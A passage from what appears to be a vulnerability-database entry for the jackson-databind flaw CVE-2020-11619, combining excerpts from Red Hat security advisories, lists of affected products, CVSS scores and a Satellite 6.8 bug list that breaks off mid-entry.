tfm-rubygem-unf_ext-debuginfo-0.0.7.2-1.el7sat.x86_64.rpm tfm-rubygem-unicode-0.4.4.4-1.el7sat.x86_64.rpm tfm-rubygem-unicode-debuginfo-0.4.4.4-1.el7sat.x86_64.rpm tfm-rubygem-websocket-driver-0.7.1-1.el7sat.x86_64.rpm tfm-rubygem-websocket-driver-debuginfo-0.7.1-1.el7sat.x86_64.rpm tfm-runtime-6.1-1.el7sat.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2018-3258 https://access.redhat.com/security/cve/CVE-2018-11751 https://access.redhat.com/security/cve/CVE-2019-12781 https://access.redhat.com/security/cve/CVE-2019-16782 https://access.redhat.com/security/cve/CVE-2020-5216 https://access.redhat.com/security/cve/CVE-2020-5217 https://access.redhat.com/security/cve/CVE-2020-5267 https://access.redhat.com/security/cve/CVE-2020-7238 https://access.redhat.com/security/cve/CVE-2020-7663 https://access.redhat.com/security/cve/CVE-2020-7942 https://access.redhat.com/security/cve/CVE-2020-7943 https://access.redhat.com/security/cve/CVE-2020-8161 https://access.redhat.com/security/cve/CVE-2020-8184 https://access.redhat.com/security/cve/CVE-2020-8840 https://access.redhat.com/security/cve/CVE-2020-9546 https://access.redhat.com/security/cve/CVE-2020-9547 https://access.redhat.com/security/cve/CVE-2020-9548 https://access.redhat.com/security/cve/CVE-2020-10693 https://access.redhat.com/security/cve/CVE-2020-10968 https://access.redhat.com/security/cve/CVE-2020-10969 https://access.redhat.com/security/cve/CVE-2020-11619 https://access.redhat.com/security/cve/CVE-2020-14061 https://access.redhat.com/security/cve/CVE-2020-14062 https://access.redhat.com/security/cve/CVE-2020-14195 https://access.redhat.com/security/cve/CVE-2020-14334 https://access.redhat.com/security/cve/CVE-2020-14380 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2020 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBX5gpEdzjgjWX9erEAQgmXRAAjIzb5ngtDgGHNv75R+NwkGD3jzRe/GfK 1DDrOBxGaminKY9q+hGwwJOGrMbr2gcfu+VtuFgUTaxFjbfml6Lsju9czOPSL+Wa 5vIcvaUObLQEwmW5hP7ZIqzZvm0UlbSgHEsv7tYwIWkITIg54p2fQzRUuSH8nRhr oomd60Mv8Ayv6IdogtiNDdv8B7avsNQrbtzf60HGtyZlX8Rro2Wy8gosbfsGl10f Z8Nc+tVwWdkdpFjcMtwmYIDtecgwxMmo3FMJRtkSrQ2VldZB9mjFj/WyfZOfV3Io OhoAiLFzi52dC68an5/VFnzZWxdOmYjqm4rBZ2MLnw/wn4jH2WOgjK5VBJUW+nmX k9pQLGrKlLQeYSVY9Je9Maxz1POajFEV1u+ByAVDBm1xBJMhlTEcTwbHt1X0jLzG C2CSzCY8Urz2j1SvYrcrBdNGSqK1wvMwDL7V7lEpaFd/dGE+JwbrOB6z2iYr3de5 /6nh/jeWFi16C0Z8FbYe021edVuzbzCITbz+UdThAITmROcE7Q6ysDPcvToANfta D2gChuqVhmTWJ9YDeQTWiErQLY4OJfklPd/5L/sIZqoZpV8B+5bTHTKsCiisyj1a f4PVZiu+CQoxHuj45rTwRLLfP9+SmJpFz+JsId6rKQ2hrzZ4DzB9srzyewd2TfvG 1yK/tAm1KBU=osSG -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce .
NOTE: This advisory is an addendum to https://access.redhat.com/errata/RHBA-2020:1414 and is an informational advisory only, to clarify security fixes released therein. No code has been modified as part of this advisory. Description:
Red Hat Single Sign-On 7.4 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications. Description:
Red Hat Process Automation Manager is an open source business process management suite that combines process management and decision service management and enables business and IT users to create, manage, validate, and deploy process applications and decision services.
It is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process. 7) - noarch
- Description:
The jackson-databind package provides general data-binding functionality for Jackson, which works on top of Jackson core streaming API.
Security Fix(es):
-
jackson-databind: Serialization gadgets in org.springframework:spring-aop (CVE-2020-11619)
-
jackson-databind: Serialization gadgets in commons-jelly:commons-jelly (CVE-2020-11620)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Bugs fixed (https://bugzilla.redhat.com/):
1826798 - CVE-2020-11620 jackson-databind: Serialization gadgets in commons-jelly:commons-jelly 1826805 - CVE-2020-11619 jackson-databind: Serialization gadgets in org.springframework:spring-aop
- Solution:
To install this update, do the following:
- Download the Data Grid 7.3.7 server patch from the customer portal. Back up your existing Data Grid installation. You should back up databases, configuration files, and so on. Install the Data Grid 7.3.7 server patch. Refer to the 7.3 Release Notes for patching instructions. Restart Data Grid to ensure the changes take effect. Bugs fixed (https://bugzilla.redhat.com/):
1595621 - CVE-2017-7658 jetty: Incorrect header handling 1715075 - CVE-2019-10172 jackson-mapper-asl: XML external entity similar to CVE-2016-3720 1730462 - CVE-2020-1695 resteasy: Improper validation of response header in MediaTypeHeaderDelegate.java class 1752770 - CVE-2020-1757 undertow: servletPath is normalized incorrectly leading to dangerous application mapping which could result in security bypass 1793970 - CVE-2020-1710 EAP: field-name is not parsed in accordance to RFC7230 1796617 - CVE-2020-1719 Wildfly: EJBContext principal is not popped back after invoking another EJB using a different Security Domain 1807305 - CVE-2020-1745 undertow: AJP File Read/Inclusion Vulnerability 1807707 - CVE-2020-1748 Wildfly: Improper authorization issue in WildFlySecurityManager when using alternative protection domain 1815470 - CVE-2020-10673 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution 1815495 - CVE-2020-10672 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution 1816216 - CVE-2020-11612 netty: compression/decompression codecs don't enforce limits on buffer allocation sizes 1816330 - CVE-2020-8840 jackson-databind: Lacks certain xbean-reflect/JNDI blocking 1816332 - CVE-2020-9546 jackson-databind: Serialization gadgets in shaded-hikari-config 1816337 - CVE-2020-9547 jackson-databind: Serialization gadgets in ibatis-sqlmap 1816340 - CVE-2020-9548 jackson-databind: Serialization gadgets in anteros-core 1819208 - CVE-2020-10968 jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider.*.RmiProvider 1819212 - CVE-2020-10969 jackson-databind: Serialization gadgets in javax.swing.JEditorPane 1821304 - CVE-2020-11111 jackson-databind: Serialization gadgets in org.apache.activemq.jms.pool.XaPooledConnectionFactory 1821311 - CVE-2020-11112 jackson-databind: Serialization gadgets in org.apache.commons.proxy.provider.remoting.RmiProvider 1821315 - CVE-2020-11113 jackson-databind: Serialization gadgets in org.apache.openjpa.ee.WASRegistryManagedRuntime 1825714 - CVE-2020-10714 wildfly-elytron: session fixation when using FORM authentication 1826798 - CVE-2020-11620 jackson-databind: Serialization gadgets in commons-jelly:commons-jelly 1826805 - CVE-2020-11619 jackson-databind: Serialization gadgets in org.springframework:spring-aop 1831139 - CVE-2020-9488 log4j: improper validation of certificate with host mismatch in SMTP appender
- The purpose of this text-only errata is to inform you about the security issues fixed in this release.
Installation instructions are available from the Fuse 7.7.0 product documentation page: https://access.redhat.com/documentation/en-us/red_hat_fuse/7.7/
- Bugs fixed (https://bugzilla.redhat.com/):
1343616 - CVE-2016-4970 netty: Infinite loop vulnerability when handling renegotiation using SslProvider.OpenSsl 1620529 - CVE-2018-1000632 dom4j: XML Injection in Class: Element. Methods: addElement, addAttribute which can impact the integrity of XML documents 1632452 - CVE-2018-3831 elasticsearch: Information exposure via _cluster/settings API 1637492 - CVE-2018-11797 pdfbox: unbounded computation in parser resulting in a denial of service 1638391 - CVE-2018-12541 vertx: WebSocket HTTP upgrade implementation holds the entire http request in memory before the handshake 1697598 - CVE-2019-3797 spring-data-jpa: Additional information exposure with Spring Data JPA derived queries 1700016 - CVE-2019-0231 mina-core: Retaining an open socket in close_notify SSL-TLS leading to Information disclosure. 1713468 - CVE-2019-12086 jackson-databind: polymorphic typing issue allows attacker to read arbitrary local files on the server. Summary:
This is a security update for JBoss EAP Continuous Delivery 18.0
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "communications contacts server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0.4.0"
},
{
"_id": null,
"model": "communications network charging and control",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0.3"
},
{
"_id": null,
"model": "active iq unified manager",
"scope": "gte",
"trust": 1.0,
"vendor": "netapp",
"version": "9.5"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.12"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.1"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0"
},
{
"_id": null,
"model": "jd edwards enterpriseone tools",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "9.2.4.2"
},
{
"_id": null,
"model": "communications evolved communications application server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.1"
},
{
"_id": null,
"model": "retail sales audit",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.0"
},
{
"_id": null,
"model": "active iq unified manager",
"scope": "gte",
"trust": 1.0,
"vendor": "netapp",
"version": "7.3"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.0"
},
{
"_id": null,
"model": "global lifecycle management opatch",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.0.1.20"
},
{
"_id": null,
"model": "retail merchandising system",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "8.0"
},
{
"_id": null,
"model": "banking platform",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "2.9.0"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "lt",
"trust": 1.0,
"vendor": "fasterxml",
"version": "2.9.10.4"
},
{
"_id": null,
"model": "communications instant messaging server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "10.0.1.4.0"
},
{
"_id": null,
"model": "steelstore cloud integrated storage",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.2"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.8"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0"
},
{
"_id": null,
"model": "enterprise manager base platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.4.0.0"
},
{
"_id": null,
"model": "agile plm",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "9.3.6"
},
{
"_id": null,
"model": "communications contacts server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0.5.0"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.7"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"_id": null,
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.12"
},
{
"_id": null,
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "17.0"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"_id": null,
"model": "communications network charging and control",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.0.1"
},
{
"_id": null,
"model": "communications diameter signaling router",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.2"
},
{
"_id": null,
"model": "enterprise manager base platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.3.0.0"
},
{
"_id": null,
"model": "communications diameter signaling router",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "gte",
"trust": 1.0,
"vendor": "fasterxml",
"version": "2.9.0"
},
{
"_id": null,
"model": "communications calendar server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0.4.0"
},
{
"_id": null,
"model": "banking platform",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "2.4.0"
},
{
"_id": null,
"model": "jd edwards enterpriseone orchestrator",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "9.2.4.2"
},
{
"_id": null,
"model": "communications network charging and control",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0.0"
},
{
"_id": null,
"model": "jackson-databind",
"scope": "eq",
"trust": 0.8,
"vendor": "fasterxml",
"version": "2.9.10.4"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-004011"
},
{
"db": "NVD",
"id": "CVE-2020-11619"
}
]
},
"configurations": {
"_id": null,
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:fasterxml:jackson-databind",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-004011"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "159724"
},
{
"db": "PACKETSTORM",
"id": "160601"
},
{
"db": "PACKETSTORM",
"id": "158651"
},
{
"db": "PACKETSTORM",
"id": "157834"
},
{
"db": "PACKETSTORM",
"id": "159208"
},
{
"db": "PACKETSTORM",
"id": "158636"
},
{
"db": "PACKETSTORM",
"id": "158095"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-387"
}
],
"trust": 1.3
},
"cve": "CVE-2020-11619",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2020-11619",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2020-004011",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-164215",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.2,
"id": "CVE-2020-11619",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2020-004011",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-11619",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2020-004011",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-387",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-164215",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2020-11619",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-164215"
},
{
"db": "VULMON",
"id": "CVE-2020-11619"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-387"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-004011"
},
{
"db": "NVD",
"id": "CVE-2020-11619"
}
]
},
"description": {
"_id": null,
"data": "FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.springframework.aop.config.MethodLocatingFactoryBean (aka spring-aop). FasterXML jackson-databind Exists in an unreliable data deserialization vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. FasterXML Jackson is a data processing tool for Java developed by American FasterXML Company. jackson-databind is one of the components with data binding function. FasterXML jackson-databind has a code issue vulnerability. An attacker could exploit this vulnerability with specially crafted input to execute arbitrary code on the system. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Important: Satellite 6.8 release\nAdvisory ID: RHSA-2020:4366-01\nProduct: Red Hat Satellite 6\nAdvisory URL: https://access.redhat.com/errata/RHSA-2020:4366\nIssue date: 2020-10-27\nCVE Names: CVE-2018-3258 CVE-2018-11751 CVE-2019-12781\n CVE-2019-16782 CVE-2020-5216 CVE-2020-5217\n CVE-2020-5267 CVE-2020-7238 CVE-2020-7663\n CVE-2020-7942 CVE-2020-7943 CVE-2020-8161\n CVE-2020-8184 CVE-2020-8840 CVE-2020-9546\n CVE-2020-9547 CVE-2020-9548 CVE-2020-10693\n CVE-2020-10968 CVE-2020-10969 CVE-2020-11619\n CVE-2020-14061 CVE-2020-14062 CVE-2020-14195\n CVE-2020-14334 CVE-2020-14380\n====================================================================\n1. Summary:\n\nAn update is now available for Red Hat Satellite 6.8 for RHEL 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Satellite 6.7 - noarch, x86_64\nRed Hat Satellite Capsule 6.8 - noarch, x86_64\n\n3. Description:\n\nRed Hat Satellite is a systems management tool for Linux-based\ninfrastructure. It allows for provisioning, remote management, and\nmonitoring of multiple Linux deployments with a single centralized tool. \n\nSecurity Fix(es):\n\n* mysql-connector-java: Connector/J unspecified vulnerability (CPU October\n2018) (CVE-2018-3258)\n* netty: HTTP Request Smuggling due to Transfer-Encoding whitespace\nmishandling (CVE-2020-7238)\n* rubygem-websocket-extensions: ReDoS vulnerability in\nSec-WebSocket-Extensions parser (CVE-2020-7663)\n* puppet: puppet server and puppetDB may leak sensitive information via\nmetrics API (CVE-2020-7943)\n* jackson-databind: multiple serialization gadgets (CVE-2020-8840\nCVE-2020-9546 CVE-2020-9547 CVE-2020-9548 CVE-2020-10968 CVE-2020-10969\nCVE-2020-11619 CVE-2020-14061 CVE-2020-14062 CVE-2020-14195)\n* foreman: unauthorized cache read on RPM-based installations through local\nuser (CVE-2020-14334)\n* Satellite: Local user impersonation by Single sign-on (SSO) user leads to\naccount takeover (CVE-2020-14380)\n* Django: Incorrect HTTP detection with reverse-proxy connecting via HTTPS\n(CVE-2019-12781)\n* rubygem-rack: hijack sessions by using timing attacks targeting the\nsession id (CVE-2019-16782)\n* rubygem-secure_headers: limited header injection when using dynamic\noverrides with user input (CVE-2020-5216)\n* rubygem-secure_headers: directive injection when using dynamic overrides\nwith user input (CVE-2020-5217)\n* rubygem-actionview: views that use the `j` or `escape_javascript` methods\nare susceptible to XSS attacks (CVE-2020-5267)\n* puppet: Arbitrary catalog retrieval (CVE-2020-7942)\n* rubygem-rack: directory traversal in Rack::Directory (CVE-2020-8161)\n* rubygem-rack: percent-encoded cookies can be used to overwrite existing\nprefixed cookie names (CVE-2020-8184)\n* hibernate-validator: Improper input validation in the interpolation of\nconstraint error messages (CVE-2020-10693)\n* puppet-agent: Puppet Agent does not properly verify SSL connection when\ndownloading a CRL (CVE-2018-11751)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\n* Provides the Satellite Ansible Modules that allow for full automation of\nyour Satellite configuration and deployment. \n\n* Adds ability to install Satellite and Capsules and manage hosts in a IPv6\nnetwork environment\n\n* Ansible based Capsule Upgrade automation: Ability to centrally upgrade\nall of your Capsule servers with a single job execution. \n\n* Platform upgrades to Postgres 12, Ansible 2.9, Ruby on Rails and latest\nversion of Puppet\n\n* Support for HTTP UEFI provisioning\n\n* Support for CAC card authentication with Keycloak integration\n\n* Add ability to upgrade Red Hat Enterprise Linux 7 hosts to version 8\nusing the LEAPP based tooling. \n\n* Support for Red Hat Enterprise Linux Traces integration\n\n* satellite-maintain \u0026 foreman-maintain are now self updating\n\n* Notifications in the UI to warn users when subscriptions are expiring. \n\nThe items above are not a complete list of changes. This update also fixes\nseveral bugs and adds various enhancements. Documentation for these changes\nis available from the Release Notes document linked to in the References\nsection. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1160344 - [RFE] Satellite support for cname as alternate cname for satellite server\n1261802 - [RFE] Make the foreman bootdisk full-host image work on UEFI systems\n1300211 - capsule-certs-generate failed to increment release number when generating certificate rpm for foreman-proxy\n1332702 - smart-proxy-openscap-send with additional features - alert if file corrupt\n1398317 - For the vms built by Satellite 6 using \"Network Based\" installation mode on VMWare, unable to change the boot sequence via BIOS\n1410616 - [RFE] Prominent notification of expiring subscriptions. \n1410916 - Should only be able to add repositories you have access to\n1429033 - Host provisioned with RHEL Workstation OS, after provisioning displayed as generic RedHat 7.3\n1461781 - [RFE]A button should be available in the GUI to clear the recurring logics. \n1469267 - need updated rubygem-rake\n1486446 - Content view versions list has slow query for package count\n1486696 - \u0027hammer host update\u0027 removes existing host parameters\n1494180 - Sorting by network address for subnet doesn\u0027t work properly\n1501499 - tomcat listens to 0.0.0.0 for serving requests but just needs localhost\n1503037 - [RFE] Cancelled future/recurring job invocations should not get the status \"failed\" but rather \"cancelled\"\n1505842 - Remote Execution engine: Error initializing command: Net::SSH::HostKeyMismatch - fingerprint 20:a9:b7:45:1a:b7:d6:42:1e:03:d1:1f:06:20:4c:e2 does not match for \"172.17.0.101\"\n1531674 - Operating System Templates are ordered inconsistently in UI. \n1537320 - [RFE] Support for Capsules at 1 version lower than Satellite\n1543316 - Satellite 6.2 Upgrade Fails with error \"rake aborted! NoMethodError: undefined method `first\u0027 for nil:NilClass\" when there are custom bookmarks created\n1563270 - Sync status information is lost after cleaning up old tasks related to sync. \n1569324 - Webrick is unable to use 2 supported TLS v1.2 ciphers (\u0027ECDHE-RSA-AES128-GCM-SHA256\u0027, \u0027ECDHE-RSA-AES256-GCM-SHA384\u0027)\n1571907 - Passenger threads throwing tracebacks on API jobs after spawning\n1576859 - [RFE] Implement automatic assigning subnets through data provided by facter\n1584184 - [RFE] The locked template is getting overridden by default\n1601101 - [RFE] Add autofill functionality to the Job invocation Search query box, copy from Hosts search box\n1607706 - [RFE] Add support for --vlanid in Satellite Kickstart Default provisioning template\n1608001 - Rearrange search/filter options on Red Hat Repositories page. \n1613391 - race condition on removing multiple organizations simultaneously\n1619274 - [RFE] Red Hat Satellite should now be able to discover and provision bare metal machines via UEFI HTTP boot\n1619422 - User Agent for Downstream RSS feed still says Foreman and Foreman Version\n1620214 - Page should auto-refresh after subscriptions have been modified on the Satellite webui\n1624049 - Changing the organization in the Satellite WebUI does not change the sync plan page information from the previous organization\n1625258 - Having empty \"Allocation (GB)\" when creating a new Host, nil:NilClass returned on creating the Host\n1627066 - Unable to revert to the original version of the provisioning template\n1630433 - [RFE] Include Ansible Satellite modules with Ansible Core modules\n1630536 - yum repos password stored as cleartext\n1632577 - Audit log show \u0027missing\u0027 for adding/removing repository to a CV\n1640615 - CVE-2018-3258 mysql-connector-java: Connector/J unspecified vulnerability (CPU October 2018)\n1645062 - host_collection controller responds with 200 instead of 201 to a POST request\n1645749 - repositories controller responds with 200 instead of 201 to a POST request\n1647216 - Lack of edit_smart_proxies permission causes error when setting host to Build\n1647364 - [RFE] Extend the audits by the http request id\n1647781 - Audits contain no data (Added foo to Missing(ID: x))\n1651297 - Very slow query when using facts on user roles as filters\n1653217 - [RFE] More evocative name for Play Ansible Roles option?\n1654347 - Satellite may create duplicate CreateRssNotifications tasks after restarting foreman tasks\n1654375 - [RFE] Mention specifically uder the admin chexbox for AD LDAP user if its created with admin role,\n1659418 - katello-tracer-upload failing with error \"ImportError: No module named katello\"\n1665277 - subscription manager register activation key with special character failed\n1665893 - candlepin refuses to start or hangs periodically when having too many messages in ActiveMQ journal\n1666693 - Command \"hammer subscription list\" is not correctly showing the comment \"Guests of \" in the \"Type\" field in the output. \n1677907 - Ansible API endpoints return 404\n1680157 - [RFE] Puppet \u0027package\u0027 provider type does not support selecting modularity streams\n1680458 - Locked Report Templates are getting removed. \n1680567 - Reporting Engine API to list report template per organization/location returns 404 error\n1681619 - [RFE] Disable the option to enter a MAC address after selecting a compute resource while creating new hosts through Satellite\n1685949 - [RFE] Support passing of attribute name instead of Id\u0027s in RHV workflow\n1687116 - kernel version checks should not use /lib/modules to determine running version\n1688886 - subscription-manager not attaching the right quantity per the cpu core\n1691416 - Delays when many clients upload tracer data simultaneously\n1697476 - [RFE] To be able to see the name of the provisioning template being used to build a host from the host itself\n1702434 - foreman-bootloaders-redhat-tftpboot expected file permissions in package don\u0027t match runtime permissions\n1705097 - An empty report file doesn\u0027t show any headers\n1709557 - [RFE] warn the user if they have done a select all and it includes the restart|reboot service\n1709842 - Tracer shows the machines needs rebooting even after reboot if kernel-debug is installed\n1710511 - Filter by os_minor includes unexpected values on the Satellite web UI. \n1715999 - Use Infoblox API for DNS conflict check and not system resolver\n1716423 - Nonexistent quota can be set\n1717403 - Broken breadcrumbs link to compute resource VM list on VM detail page\n1718012 - [RFE] Add a hard limit of 100 items to restrict any fact child-hash/array\n1718954 - [RFE] When the contentAccessMode is set to org_environment for an owner, we should disable auto-attach globally\n1719509 - [RFE] \"hammer host list\" including erratas information\n1719516 - [RFE] \"hammer host-collection hosts\" including erratas information\n1720725 - [RFE] Ability to override DHCP options and wait_after_restart option for race condition\n1721419 - SSH key cannot be added when FIPS enabled\n1722954 - Slow performance when running \"hammer host list\" with a high number of Content Hosts (15k+ for example)\n1723313 - foreman_tasks:cleanup description contain inconsistent information\n1724494 - [Capsule][smart_proxy_dynflow_core] \"PID file /var/run/foreman-proxy/smart_proxy_dynflow_core.pid not readable (yet?) after start\"\n1724497 - CVE-2019-12781 Django: Incorrect HTTP detection with reverse-proxy connecting via HTTPS\n1726768 - [RFE] Red Hat Satellite 6 GUI, Tasks should show Full name\n1729968 - Editing disk size of a Compute Profile for a VMware Compute Resource makes the whole Storage section disappear\n1730083 - [RFE] Add Jobs button to host detail page\n1731155 - Cloud init template missing snippet compared to Kickstart default user data\n1731229 - podman search against Red Hat Satellite 6 fails. \n1731235 - [RFE] Create Report Template to list inactive hosts\n1733241 - [RFE] hammer does not inherit parent location information\n1733650 - Satellite receives RPM1004 pulp error and 403 Forbidden http error retrieving packages from CDN\n1736809 - undefined method `split\u0027 for nil:NilClass when viewing the host info with hammer\n1737135 - Content Hosts loses subscriptions after Vmotion and auto attach is unable to assigned the subscriptions if any other subscription is already attached to the host. \n1737564 - [RFE] Support custom images on Azure\n1738548 - Parameter --openscap-proxy-id is missing in hammer host create command. \n1740943 - Increasing Ansible verbosity level does not increase the verbosity of output\n1743056 - While creating a host for a particular location, all the domains are in the pull down list, even if only one domain is selected for that location. \n1743776 - Error while deleting the content view version. \n1745516 - Multiple duplicate index entries are present in candlepin database\n1746936 - satellite6 is not using remote execution by default even after setting remote execution by default from satellite web-UI. \n1749692 - Default Rhel8 scap content does not get populated on the Satellite\n1749916 - [RFE] Satellite should support certificates with \u003e 2048 Key size\n1751981 - Parent 